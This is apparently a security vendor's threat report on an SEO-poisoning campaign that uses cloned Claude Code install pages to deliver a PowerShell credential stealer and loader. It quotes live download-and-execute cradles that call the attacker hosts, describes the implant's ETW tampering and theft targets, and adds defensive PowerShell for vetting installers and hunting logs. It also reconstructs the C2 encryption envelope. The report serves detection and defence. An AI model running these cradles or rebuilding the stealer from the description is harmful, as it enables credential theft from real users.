SEO campaign targeting Claude Code
How mnemonic’s monitoring detected a campaign targeting developer and utility software users via SEO poisoning

TL;DR
mnemonic’s Threat Intelligence team investigated this campaign after multiple detections in our customer base. The campaign uses search engine optimisation (SEO) poisoning, cloned software sites, malicious installation instructions, and signed loader binaries to deliver credential theft tooling disguised as legitimate software.
In March 2026, the threat actor used lures themed around developer and utility software, including Mullvad VPN, KeePassXC, WinSCP, Joplin, Cyberduck, PuTTY, Amazon S3 Browser, FileZilla, and EmEditor. Based on public sandbox data, the initial activity used signed malicious binaries as its first stage.
In April 2026, we observed a change in the threat actor's behaviour. We detected multiple customers downloading and attempting to execute scripts presented as the Claude Code installer. The threat actor used basic request gating and, in some cases, served a benign Claude Code installation script.
The primary PowerShell payload observed in this latest activity functions as both a stealer and a loader. It disables PowerShell ETW logging, applies anti-analysis and regional gating, fingerprints the host, steals credentials and application data, encrypts the resulting record set, uploads the data to attacker-controlled infrastructure, and can execute additional PowerShell supplied by the server.
This campaign is one of many we have observed targeting users of AI tooling via SEO poisoning over the last year. It highlights how effective such attacks are: we continue to observe end users running malicious commands in the belief that they are installing such tooling.
mnemonic's initial detection and response
In early April 2026, mnemonic detected several ClickFix-like attacks across multiple customers. Both the user activity and the executed commands appeared consistent with a legitimate installation of Claude Code on Windows hosts.
Initial command
$ irm https://claude-setup[.]com/install[.]ps1 | iex
The install.ps1 is a direct copy of the legitimate version from Anthropic, but it downloads binaries from Google Cloud Storage (GCS) instead of Anthropic’s servers. A manual download of the binaries from that GCS location returned a legitimate, signed version of Claude Code.
Analysis of host data indicated, however, that an additional PowerShell script (SHA-256: 58f88ee2542e720f15d0b08d52c96384c7a7ae49b26e2dfd0754a9d63bf22375) was downloaded and executed shortly afterwards using the irm and iex aliases for Invoke-RestMethod and Invoke-Expression. These attempts were blocked by the Endpoint Detection and Response (EDR) technology running on the hosts.
Second stage command
$ irm events[.]ms709[.]com | iex
Although execution was apparently blocked by EDR, mnemonic initiated a full AV scan on the device and isolated it until the results were available. A thorough review of sign-in logs for the affected users was also performed.
mnemonic is currently researching relevant infrastructure and samples to further improve our detection capabilities for this campaign.
A full list of Indicators of Compromise is shared at the end of this article.
How the campaign works and what we currently know
The campaign is built around user intent. Victims search for a legitimate software package, land on a cloned or misleading software page, and are presented with either a download flow or a PowerShell installation command. That technique is particularly effective against developers and administrators, who routinely use bootstrap installers and terminal-based setup commands.
Our earliest observations of this campaign are from early March 2026, where the lure set spans multiple software categories, including developer tools, secure file transfer clients, password managers, VPN software, cloud storage utilities, and note-taking applications. The initial access vector was search-driven redirection to cloned software sites. Victims were funnelled to pages that presented a direct download button. In several cases, the threat actor appears to have used signed loader binaries to reduce friction at the point of execution and improve the credibility of the lure.
A change in the campaign occurred at the start of April, when the threat actor focused exclusively on Claude Code and moved to new infrastructure for the initial stages. The backend infrastructure remained the same.


The threat actor finally moved to using Cloudflare mid-April 2026. This article focuses on infrastructure and samples observed in the April campaign.
The initial access vector was SEO poisoning redirecting to cloned software sites. Victims were funnelled to pages that presented a terminal-based installation command.
The installation script (SHA-256: b9702ecf2928354dfc32e25468848408de40b82d237f83953fdc6d6d655050ef) appears legitimate: it retrieves the latest version identifier from a GCS bucket, downloads claude.exe, validates its SHA-256 checksum against the release manifest, runs claude.exe install, and removes the temporary file. In our testing, legitimate, signed versions of Claude Code were downloaded.
This is likely request gating: the server decides per request whether to serve the benign script, which preserves the appearance of legitimacy during casual review while still exploiting users who follow the scripted installation guidance. A consequence for responders is that re-fetching the script from an analysis host may return only the benign copy, so host telemetry from the original execution is the more reliable record of what actually ran.
If the request passes the gate, a modified version of the installer is served instead, which in turn downloads the main PowerShell implant.
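Because the cloned install.ps1 differs from the vendor copy only in where it fetches binaries from, the practical check before running any "irm ... | iex" one-liner is to fetch the script into a variable instead of piping it into Invoke-Expression, diff it against the copy served from the vendor's documented URL, and list every host it would contact. The following is an added example written for this article, not mnemonic's tooling or Anthropic's installer; the two script bodies are constructed stand-ins, and example-vendor.test and example-bucket are placeholder names, not real hosts.

```powershell
# Added example: vet a downloaded installer offline before executing it.
# Obtain the texts with, e.g.:  $candidate = Invoke-RestMethod -Uri $urlFromWebPage
# (never "| iex"), and $reference from the vendor's documented installer URL.

function Get-ScriptHosts {
    param([Parameter(Mandatory)][string]$ScriptText)
    # Every http(s) URL literal in the script, reduced to distinct host names.
    $urls = [regex]::Matches($ScriptText, 'https?://[^\s"''\)]+') | ForEach-Object { $_.Value }
    $urls | ForEach-Object { ([uri]$_).Host } | Sort-Object -Unique
}

function Compare-InstallerScript {
    param(
        [Parameter(Mandatory)][string]$ReferenceText,   # vendor copy
        [Parameter(Mandatory)][string]$CandidateText    # script a web page told you to run
    )
    # Normalise whitespace and blank lines so only substantive edits show up.
    $refLines = $ReferenceText -split "`r?`n" | ForEach-Object { $_.Trim() } | Where-Object { $_ -ne '' }
    $canLines = $CandidateText -split "`r?`n" | ForEach-Object { $_.Trim() } | Where-Object { $_ -ne '' }
    $diff = Compare-Object -ReferenceObject $refLines -DifferenceObject $canLines
    $refHosts = @(Get-ScriptHosts $ReferenceText)
    $canHosts = @(Get-ScriptHosts $CandidateText)
    [pscustomobject]@{
        Identical      = ($diff.Count -eq 0)
        RemovedLines   = @($diff | Where-Object SideIndicator -eq '<=' | ForEach-Object InputObject)
        AddedLines     = @($diff | Where-Object SideIndicator -eq '=>' | ForEach-Object InputObject)
        ReferenceHosts = $refHosts
        CandidateHosts = $canHosts
        NewHosts       = @($canHosts | Where-Object { $_ -notin $refHosts })   # hosts only the candidate contacts
    }
}

# Constructed sample texts (not the real installer): identical except for the download origin.
$reference = @'
$base = "https://example-vendor.test/releases"
$version = Invoke-RestMethod "$base/latest"
Invoke-WebRequest "$base/$version/claude.exe" -OutFile $exe
'@
$candidate = @'
$base = "https://storage.googleapis.com/example-bucket/releases"
$version = Invoke-RestMethod "$base/latest"
Invoke-WebRequest "$base/$version/claude.exe" -OutFile $exe
'@

Compare-InstallerScript -ReferenceText $reference -CandidateText $candidate | Format-List
# NewHosts contains storage.googleapis.com; Identical is False.
```

A non-empty NewHosts, or any AddedLines at all, is the signal to stop: a bootstrap installer that is "the same" as the vendor's except for its download origin is exactly the modification this campaign relies on. Note that because the gate may serve the benign copy to a second request, the comparison should be run on the text that was actually retrieved on the affected host, not on a fresh fetch from an analysis machine.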
Note that the threat actor emulates the Claude Code installation guide, which specifically asks the user to download and install the legitimate version using the following PowerShell command.

The lure and staging infrastructure associated with the April 2026 activity is:
- claudecode[.]co[.]com
- claude-setup[.]com
- claudecode-install[.]co[.]com
The infrastructure was initially hosted at Global Connectivity Solutions LLP (ASN: 215540) and MIRhosting B.V. (ASN: 52000) before being moved behind Cloudflare in mid-April 2026.
The C2 host observed in the April 2026 activity was events.ms709[.]com. The malware builds victim-specific paths from a static campaign token and the local system's MachineGuid:
- /take/XYaR5gFi/<MachineGuid>
- /process/XYaR5gFi/<MachineGuid>
- /validate/XYaR5gFi/<MachineGuid>
What is the delivered payload?
The downloaded implant is a heavily obfuscated PowerShell stealer with loader functionality. Its core behaviour includes:
- PowerShell telemetry suppression
- anti-analysis checks
- regional execution blocking
- host profiling
- credential and application data theft
- encrypted exfiltration
- server-directed PowerShell execution
The payload supports broad credential and data theft while retaining the ability to stage additional PowerShell if the compromised host merits follow-on action.
The script disables PowerShell ETW logging before moving into collection. It reflects into System.Diagnostics.Eventing.EventProvider and System.Management.Automation.Tracing.PSEtwLogProvider, then clears the underlying provider state. This is a familiar technique, but it remains effective against environments that rely heavily on PowerShell telemetry for script visibility. Because a script block is logged when it is compiled, before it executes, the block that performs this tampering is itself still recorded; only subsequent activity in that process goes dark, so the reflection strings are a reliable hunting anchor.
The payload also creates a single-instance global mutex. That mechanism prevents duplicate execution on the same host and reduces duplicate uploads to the C2.
The anti-analysis logic includes both heuristic checks and regional gating. The script exits when the current system resolves to one of the following blocked region codes:
AZ, AM, BY, GE, KZ, KG, MD, RU, TJ, TM, UZ, UA, IR
This region list is consistent with the operational guardrails commonly used by financially motivated threat actors seeking to avoid infecting systems in Russia, the CIS region, and selected neighbouring jurisdictions.
The payload derives a stable victim identifier from HKLM:\SOFTWARE\Microsoft\Cryptography\MachineGuid. That value is embedded in the URI path used for beaconing and exfiltration, which makes the path structure itself useful for victim tracking and sample clustering.
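The observable artefacts described so far (the irm-to-iex cradles, the ETW provider reflection, the lure and C2 hosts, and the token-plus-MachineGuid path structure) can be hunted in two log sources: PowerShell Script Block Logging (Event ID 4104 text) and web-proxy logs. The following is an added example, not mnemonic's detection content; the script block texts and proxy lines are constructed samples, and the hosts are written undefanged here only so the regexes match. Extend $LureHosts from the indicator table at the end of the article.

```powershell
# Added example: hunt PowerShell script block text and proxy logs for this campaign.

$LureHosts = @('claudecode.co.com', 'claude-setup.com', 'claudecode-install.co.com',
               'events.ms709.com', 'metrics.msft17.com')   # from the article's IoC list
$CampaignToken = 'XYaR5gFi'

function Test-ScriptBlockText {
    # Returns why a script block (e.g. the message of a 4104 event) looks like this campaign.
    param([Parameter(Mandatory)][string]$Text)
    $reasons = New-Object System.Collections.Generic.List[string]
    # 1. download cradle: irm/iwr (or long forms) piped into iex, or iex(...) wrapping them
    if ($Text -match '\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|\r\n]*\|\s*(iex|Invoke-Expression)\b' -or
        $Text -match '\b(iex|Invoke-Expression)\s*\(\s*(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b') {
        $reasons.Add('download cradle fed straight into Invoke-Expression')
    }
    # 2. reflection into the PowerShell ETW provider (the implant's first action)
    if ($Text -match 'PSEtwLogProvider|System\.Diagnostics\.Eventing\.EventProvider') {
        $reasons.Add('reference to PowerShell ETW provider internals')
    }
    # 3. known campaign hosts
    foreach ($h in $LureHosts) {
        if ($Text -match [regex]::Escape($h)) { $reasons.Add("known campaign host $h") }
    }
    [pscustomobject]@{ Suspicious = ($reasons.Count -gt 0); Reasons = $reasons.ToArray(); Text = $Text }
}

function Find-CampaignBeacons {
    # Match the victim-specific C2 paths and extract the MachineGuid for victim clustering.
    param([Parameter(Mandatory)][string[]]$ProxyLines)
    $pattern = "/(?<op>run|take|process|validate)/$CampaignToken(?:/(?<guid>[0-9a-fA-F-]{36}))?"
    foreach ($line in $ProxyLines) {
        $m = [regex]::Match($line, $pattern, 'IgnoreCase')
        if ($m.Success) {
            [pscustomobject]@{ Op = $m.Groups['op'].Value; MachineGuid = $m.Groups['guid'].Value; Line = $line }
        }
    }
}

# Constructed samples (not real telemetry).
$blocks = @(
    'irm https://claude-setup.com/install.ps1 | iex',
    'irm events.ms709.com | iex',
    'Get-ChildItem C:\Users\alice\Documents'
)
$proxy = @(
    '2026-04-08T09:12:01Z 10.1.2.3 POST https://events.ms709.com/take/XYaR5gFi/1f2e3d4c-5b6a-4798-8a9b-0c1d2e3f4a5b 200',
    '2026-04-08T09:13:44Z 10.1.2.3 GET https://events.ms709.com/run/XYaR5gFi 200',
    '2026-04-08T09:14:00Z 10.1.2.9 GET https://www.example.com/ 200'
)

$blocks | ForEach-Object { Test-ScriptBlockText $_ } | Where-Object Suspicious | Format-List Reasons, Text
Find-CampaignBeacons $proxy | Format-Table Op, MachineGuid
```

The first two sample blocks are flagged (cradle plus known host), the third is not; the proxy hunt yields the /take beacon with its MachineGuid and the /run fetch without one. Grouping Find-CampaignBeacons output by MachineGuid gives one row per victim even when a host changes IP, which is the clustering property the path structure provides.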
The initial beacon contains:
- the campaign token XYaR5gFi
- Windows product and version data
- physical memory size
- current username
- computer name
- the machine-derived victim identifier
The payload also builds broader host inventory data, including Windows version and build information, RAM size, country code, installed software, running processes, username, computer name, and the machine GUID.
The script writes a sandbox.txt record that inventories common user folders such as Desktop, Documents, and Downloads. Those listings serve two purposes. First, they help the operator determine whether the system belongs to a real user rather than an analysis environment. Second, they expose naming conventions, user interests, and likely business context before the operator commits to further action.
Credential theft centres on four sources:
- Windows Credential Manager
- Chromium-based browsers
- Electron applications
- Software-specific credential stores and configuration files
The Credential Manager collector uses advapi32!CredEnumerate and stores output as WinCreds.txt. Browser and Electron theft targets standard Chromium artifacts such as Login Data, Web Data, History, Cookies, Network\Cookies, and Local State. The script explicitly handles encrypted_key and app_bound_encrypted_key, indicating awareness of modern Chromium key storage and support for working credential and cookie recovery rather than simple file collection.
The application set includes:
- Discord
- Slack
- Mattermost
- Notion
- Zoom
- WinSCP
- Steam
- OpenVPN
- Specter wallet
These targets point to a focus on browser sessions, enterprise access, VPN credentials, administrator tooling, and financially relevant artifacts.
How does Command and Control work?
The payload uses HTTPS and .NET System.Net.WebClient for transport, with the client configured to use the system proxy and DefaultCredentials. That choice improves execution reliability in enterprise environments where outbound traffic may require authenticated proxy access.
The C2 protocol uses a consistent JSON envelope containing three fields, where enc is encrypted with AES-CBC, key is RSA-encrypted using OAEP padding, and sig is an RSA PKCS#1 v1.5 signature over plaintext hashed with SHA-256.
{
"enc": "<base64 AES ciphertext>",
"key": "<base64 RSA-encrypted AES_key||AES_IV>",
"sig": "<base64 RSA signature over plaintext>"
}
For each outbound message, the following steps are performed:
- Generate a random 32-byte AES key.
- Generate a random 16-byte AES IV.
- Encrypt plaintext with AES-CBC.
- Concatenate AES_key || AES_IV into a 48-byte buffer.
- Encrypt that 48-byte buffer with RSA-OAEP.
- Sign the original plaintext with RSA PKCS#1 v1.5 SHA-256.
- Base64-encode all three outputs.
- Serialise as JSON with keys enc, key, and sig.
After exfiltration, the payload decrypts the server response, verifies the returned signature, parses the task stream, and dispatches commands by opcode. One of the supported tasks launches:
powershell.exe -command IEX(Invoke-WebRequest -UseBasicParsing '<url>')
Execution is performed through Shell.Application.ShellExecute with the open verb. This makes the payload both a stealer and a stage loader. A successful infection can therefore progress from credential theft to additional PowerShell delivery without requiring a new initial implant.
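To make the envelope concrete in both directions (the client's upload, and the client's verification of the server's reply), here is an added reconstruction written for this article. It is not the implant's code: the article does not give the key material, the OAEP hash, or the AES padding, so fresh 2048-bit keys, OAEP with SHA-1 (the variant accepted by every .NET RSA implementation) and PKCS7 padding are assumptions, and the beacon body is a constructed sample. RSA.Create(2048) needs .NET Framework 4.7.2 or PowerShell 7.

```powershell
# Added example: the enc / key / sig envelope, built and then opened on the other side.
using namespace System.Security.Cryptography

function Protect-Envelope {
    param(
        [Parameter(Mandatory)][string]$Plaintext,
        [Parameter(Mandatory)][RSA]$RecipientPublic,   # wraps the AES key (server key for an upload)
        [Parameter(Mandatory)][RSA]$SenderPrivate      # signs the plaintext (client key for an upload)
    )
    $data = [Text.Encoding]::UTF8.GetBytes($Plaintext)
    $aes = [Aes]::Create()
    $aes.KeySize = 256; $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'   # padding is an assumption
    $aes.GenerateKey(); $aes.GenerateIV()                            # 32-byte key, 16-byte IV
    $enc = $aes.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
    $keyIv = New-Object byte[] 48                                    # AES_key || AES_IV
    [Array]::Copy($aes.Key, 0, $keyIv, 0, 32)
    [Array]::Copy($aes.IV, 0, $keyIv, 32, 16)
    $key = $RecipientPublic.Encrypt($keyIv, [RSAEncryptionPadding]::OaepSHA1)   # OAEP hash is an assumption
    $sig = $SenderPrivate.SignData($data, [HashAlgorithmName]::SHA256, [RSASignaturePadding]::Pkcs1)
    $aes.Dispose()
    [ordered]@{ enc = [Convert]::ToBase64String($enc)
                key = [Convert]::ToBase64String($key)
                sig = [Convert]::ToBase64String($sig) } | ConvertTo-Json -Compress
}

function Unprotect-Envelope {
    param(
        [Parameter(Mandatory)][string]$Json,
        [Parameter(Mandatory)][RSA]$RecipientPrivate,  # unwraps the AES key
        [Parameter(Mandatory)][RSA]$SenderPublic       # checks the signature
    )
    $msg = $Json | ConvertFrom-Json
    $keyIv = $RecipientPrivate.Decrypt([Convert]::FromBase64String($msg.key), [RSAEncryptionPadding]::OaepSHA1)
    $aes = [Aes]::Create()
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $aes.Key = [byte[]]$keyIv[0..31]
    $aes.IV  = [byte[]]$keyIv[32..47]
    $ct = [Convert]::FromBase64String($msg.enc)
    $data = $aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
    $aes.Dispose()
    # The signature covers the plaintext, so it can only be checked after decryption;
    # nothing in the message is acted on until it passes.
    $ok = $SenderPublic.VerifyData($data, [Convert]::FromBase64String($msg.sig),
                                   [HashAlgorithmName]::SHA256, [RSASignaturePadding]::Pkcs1)
    if (-not $ok) { throw 'envelope signature verification failed' }
    [Text.Encoding]::UTF8.GetString($data)
}

# Demo: one key pair per side. The same objects stand in for public and private halves here;
# in practice each peer holds only the other's public key.
$serverKey = [RSA]::Create(2048)
$clientKey = [RSA]::Create(2048)
$beacon = '{"token":"XYaR5gFi","os":"Windows","user":"alice","host":"WS-01"}'   # constructed sample
$wire = Protect-Envelope -Plaintext $beacon -RecipientPublic $serverKey -SenderPrivate $clientKey
$wire                                                                           # {"enc":"...","key":"...","sig":"..."}
Unprotect-Envelope -Json $wire -RecipientPrivate $serverKey -SenderPublic $clientKey   # returns $beacon

# The reply direction swaps the roles: the server wraps with the client's public key and signs
# with its own private key, and the client calls Unprotect-Envelope with its private key and
# the server's public key, which is the "verifies the returned signature" step described above.
```

Two properties of this design matter for defenders. First, the plaintext is never recoverable from a capture without the recipient's RSA private key, so network inspection yields only the path structure and message sizes; host-side collection is where the content is. Second, because the client verifies a server signature before dispatching tasks, an analyst cannot inject tasks into a live victim by spoofing the C2 without the server's signing key, which limits sinkholing to observation.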
Concluding remarks
While not highly sophisticated, the campaign highlights how effective SEO poisoning currently is against users of broadly used tooling, particularly when combined with near-perfect clones of legitimate websites.
We are currently seeing multiple SEO campaigns targeting AI tooling, and expect this trend to continue as more and more end users, especially non-technical ones, want to use such tooling.
Indicators of Compromise
Domains
| Indicator | Role |
| --- | --- |
| events.ms709[.]com | Payload delivery and Command and Control server |
| claudecode.co[.]com | Lure and request gate |
| claude-setup[.]com | Lure and request gate |
| claudecode-install.co[.]com | Lure and request gate |
| winscp-download.us[.]org | Lure |
| winscp-setup[.]net | Lure |
| winscp-app[.]org | Lure |
| mullvad-vpn.us[.]org | Lure |
| mullvad-download[.]org | Lure |
| mullvad-download[.]it[.]com | Lure |
| winscp-downloads[.]com | Lure |
| s3-browser[.]quest | Lure |
| s3-browser-download[.]blog | Lure |
| em-editor[.]co[.]com | Lure |
| joplin-download[.]com | Lure |
| joplin-desktop[.]app | Lure |
| emeditor-download[.]co[.]com | Lure |
| cyberduck[.]info | Lure |
| cyber-duck[.]co[.]com | Lure |
| filezilla-project[.]us[.]com | Lure |
| putty-setup[.]us[.]com | Lure |
| cyberduck-ftp[.]com | Lure |
| cyberduck-download[.]org | Lure |
| winscp-ftps[.]com | Lure |
| keepassxc[.]us[.]org | Lure |
| metrics.msft17[.]com | Command and Control server |
URL Patterns and Paths
- /run/XYaR5gFi
- /take/XYaR5gFi/<MachineGuid>
- /process/XYaR5gFi/<MachineGuid>
- /validate/XYaR5gFi/<MachineGuid>